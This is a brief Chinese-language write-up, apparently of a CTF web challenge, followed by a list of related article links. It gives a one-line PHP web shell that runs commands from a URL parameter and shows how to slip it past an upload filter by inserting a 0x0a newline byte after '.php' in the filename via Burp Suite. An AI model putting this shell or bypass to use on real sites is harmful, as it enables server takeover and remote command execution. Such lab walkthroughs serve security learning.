Web页面:
新建一个一句话木马:
0.php
<?php system($_GET[0]); ?>上传木马, burpsuite 抓包。
直接上传是回显 bad file。
我们查看数据包的二进制内容(hex),内容是以16进制显示的,找到文件名那一栏,在 .php 的后面添加换行符,在ASCII编码表中,回车符的16进制表示是0x0D,而换行符的16进制表示是0x0A,所以在这里填 0a。
send 后,我们访问一下。发现木马上传成功。
相关推荐
wljt15 分钟前
HTTP和openFeign汤愈韬7 小时前
ACL概述、ACL原理、基本ACL应用及配置码刘的极客手记11 小时前
VCAP4-DCA Beta 考试体验分享与 esxcli 自动化实战(第二、三部分)青岑CTF11 小时前
攻防世界-Ics-05-胎教版wp朝风工作室12 小时前
开源一款轻量级跨网段 IPC 设备发现与网络配置工具Yff_world12 小时前
网络通信模型Qaz5556669112 小时前
透明DNS选路实验haluhalu.13 小时前
Linux网络编程------网络基础坐怀不乱杯魂13 小时前
Linux网络 - HTTP协议Palpitate_LL13 小时前
Mongoose 搜索注入漏洞 CVE-2024-53900 到 CVE-2025-23061